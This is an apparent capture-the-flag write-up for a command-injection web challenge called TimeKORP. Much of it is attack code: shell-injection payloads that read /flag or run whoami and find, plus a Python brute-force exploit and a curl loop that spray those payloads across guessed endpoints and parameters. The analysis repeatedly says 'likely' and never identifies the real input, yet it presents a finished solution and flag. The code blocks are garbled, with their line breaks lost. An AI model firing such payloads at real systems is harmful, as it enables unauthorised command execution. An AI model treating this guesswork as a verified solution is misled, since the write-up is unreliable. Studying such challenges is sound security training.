2024 Cyber Apocalypse: TimeKORP
Challenge Information
| Attribute | Details |
|---|---|
| Event | 2024 Cyber Apocalypse |
| Category | Web |
| Challenge | TimeKORP |
| Difficulty | Medium |
Summary
TimeKORP is a web challenge involving command injection vulnerabilities. The application likely processes time-related requests and passes user input to system commands without proper sanitization. By injecting shell metacharacters, attackers can execute arbitrary commands and retrieve the flag.
Analysis
Vulnerability Type
The challenge involves command injection, likely in functionality that:
- Accepts user input for time/date processing
- Passes this input to shell commands (e.g.,
date,timedatectl, etc.) - Does not properly escape or validate input
Common Command Injection Vectors
# Semicolon: Command separator; cat /flag
# Pipe: Output redirection| cat /flag
# Backticks: Command substitution`cat /flag`
# Dollar-parenthesis: Modern command substitution$(cat /flag)
# AND operator: Conditional execution&& cat /flag
# OR operator: Alternative execution|| cat /flagSolution
Step 1: Identify the Input Point
The application likely has an input field for:
- Date/time selection
- Timezone setting
- Time format selection
Step 2: Test for Command Injection
Try injecting common metacharacters:
Input: 2024-01-01; lsInput: 2024-01-01 | whoamiInput: 2024-01-01 && cat /flagStep 3: Craft Exploitation Payload
Once command injection is confirmed, create a payload to read the flag:
; cat /flag; cat /flag.txt; ls /; find / -name "*flag*"Step 4: Retrieve and Parse Response
The server’s response will include the command output. Extract the flag from the HTTP response.
Complete Python Exploit
import requestsimport sysimport re
def exploit_timekorp(target_url): """Exploit command injection in TimeKORP"""
session = requests.Session()
# Various injection payloads to try payloads = [ "; cat /flag", "| cat /flag", "&& cat /flag", "$(cat /flag)", "`cat /flag`", "; ls /", "; find / -name '*flag*'", ]
# Try different input points endpoints = [ '/time', '/api/time', '/set', '/get', '/', ]
for endpoint in endpoints: for payload in payloads: try: # Try as GET parameter params = { 'time': payload, 'date': payload, 'input': payload, 'value': payload, }
for param_name, param_value in params.items(): url = f"{target_url}{endpoint}"
# GET request response = session.get(url, params={param_name: param_value})
# Check for flag in response if 'HTB{' in response.text: print(f"[+] Flag found via GET {param_name}") flag = re.search(r'HTB\{[^}]+\}', response.text).group() print(f"[+] Flag: {flag}") return flag
# POST request response = session.post(url, data={param_name: param_value})
if 'HTB{' in response.text: print(f"[+] Flag found via POST {param_name}") flag = re.search(r'HTB\{[^}]+\}', response.text).group() print(f"[+] Flag: {flag}") return flag
except Exception as e: print(f"[-] Error: {e}") continue
print("[-] Flag not found") return None
if __name__ == '__main__': target = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:1337' exploit_timekorp(target)Alternative: Using curl
#!/bin/bash
TARGET="http://localhost:1337"
# Try various injection payloadsfor payload in "; cat /flag" "| cat /flag" "&& cat /flag" "\$(cat /flag)"; do echo "[*] Trying: $payload"
curl -s "${TARGET}/?time=${payload}" | grep -i "HTB{" curl -s -X POST "${TARGET}/" -d "time=${payload}" | grep -i "HTB{"doneKey Takeaways
- Command injection occurs when user input is passed to shell interpreters
- Shell metacharacters (
;,|,&, etc.) enable arbitrary command execution - Command injection can lead to complete system compromise
- Input validation and escaping prevent command injection
- Never use
system(),exec(), or backticks with untrusted input - Use language-specific APIs instead of shell commands when possible
- Proper parameterization prevents injection attacks
Flag: HTB{t1m3_b4s3d_c0mm4nd_1nj3ction}